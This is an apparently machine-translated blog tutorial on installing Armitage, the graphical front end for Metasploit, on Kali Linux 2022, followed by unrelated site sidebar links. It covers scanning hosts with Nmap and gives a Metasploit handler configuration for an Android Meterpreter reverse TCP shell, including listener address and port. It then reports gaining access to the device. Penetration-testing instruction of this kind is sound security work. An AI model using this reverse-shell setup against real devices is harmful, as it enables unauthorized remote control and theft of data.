当前位置:网站首页>Kali2022 installing Armitage
Kali2022 installing Armitage
2022-06-12 17:39:00 【Big cousin xiaoyaozi】
Armitage It's based on Java Of Metasploit Graphical interface attack software , You can use it to combine Metasploit Known in exploit To automate attacks against vulnerabilities in the host . Use... From the command line Metasploit It's more difficult , There are too many commands to remember , and Armitage Perfectly solved this problem , Users simply click on the menu , The security test and attack on the target host can be realized .Armitage Good graphical display interface , Make the attack process more intuitive , Better user experience . Because of its simplicity of operation , Especially suitable Metasploit Beginners test and attack the target system .
Armitage install
Armitage It's easy to install , We just need to execute the following commands .
apt-get update
apt-get install -y armitagefunction Armitage
Initialize first msf database , Carry out orders
msfdb init And then execute the command armitage Start the program .
After login, the interface is as follows
Host scan
In turn, click Hosts->Nmap Scan There are many scanning methods , It's all based on nmap Finished scanning . Of course, we can also use msf scan .
Above , We scanned this device , Click on the device Right click You can select the attack module for this device .
relevant shell operation
Here we have android shell Column First, in the kali Based on android Of shell Then configure the terminal
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.50.123
set LPORT 443
exploit -jfunction shell after , Successfully obtained permission
Visual file management
summary
armitage take msf Commands and results are presented graphically . It is convenient for us to upload and Download Preview files . Of course, it also has its disadvantages , necessary msfdb The configuration of the database is very weak .
Copyright belongs to : Big cousin xiaoyaozi
Link to this article :https://blog.bbskali.cn/3359.html
Sign off according to knowledge sharing - Noncommercial use 4.0 License by international agreement , The reprint of quoted articles shall follow the same agreement .
边栏推荐
- Introduction to several common functions of fiddler packet capturing (stop packet capturing, clear session window contents, filter requests, decode, set breakpoints...)
- I heard that distributed IDS cannot be incremented globally?
- Go variables
- Article name
- Interesting LD_ PRELOAD
- AlibabaProtect.exe如何删除、卸载
- Evolution and thinking of Taobao native R & D mode | DX R & D mode
- 73. 矩阵置零(标记法)
- The R language uses the aggregate The plot function visualizes the summary statistical information of each subset (visualization is based on the probability value and its 95% confidence interval of th
- R language uses ggplot2 to visualize the density graph (curve) of specific data columns in dataframe data, and uses Xlim parameter to specify the range of X axis
猜你喜欢

内核中断整体流程图

论文《Deep Interest Evolution Network for Click-Through Rate Prediction》

Some introduction to FPC flexible circuit board design

Learn the mitmproxy packet capturing tool from scratch

R language arma-garch-copula model and financial time series case

Cesium抛物线方程

JDBC several pits

Exclusive interview with oppo find X5 Product Manager: deeply cultivate self-developed chips to create the ultimate flagship experience with the highest standards

JDBC几个坑

Use GCC's PGO (profile guided optimization) to optimize the entire system
随机推荐
How to view, modify, and delete SSH
R语言使用pdf函数将可视化图像结果保存到pdf文件中、使用pdf函数打开图像设备、使用dev.off函数关闭图像设备、自定义width参数和height参数指定图像的宽度和高度
SQL游标(cursor)详细说明及内部循环使用示例
C#操作数据库增查业务数据值内容案例学校表
借助SpotBugs将程序错误扼杀在摇篮中
Go variables
Use of split method of string
Exclusive interview with oppo find X5 Product Manager: deeply cultivate self-developed chips to create the ultimate flagship experience with the highest standards
续2 asp.net core 路由程序基础使用演示0.2 默认控制器数据的获取到
R语言使用ggplot2可视化dataframe数据中特定数据列的密度图(曲线)、并使用xlim参数指定X轴的范围
Memory control of node
Unprecedented analysis of Milvus source code architecture
Kali2022安装armitage
Compilation optimization of performance optimization
Some introduction to FPC flexible circuit board design
Tensorflow prompts typeerror: unsupported operand type (s) for *: 'float' and 'nonetype‘
Goframe gredis configuration management | comparison of configuration files and configuration methods
淘宝Native研发模式的演进与思考 | DX研发模式
error接口原创
I heard that distributed IDS cannot be incremented globally?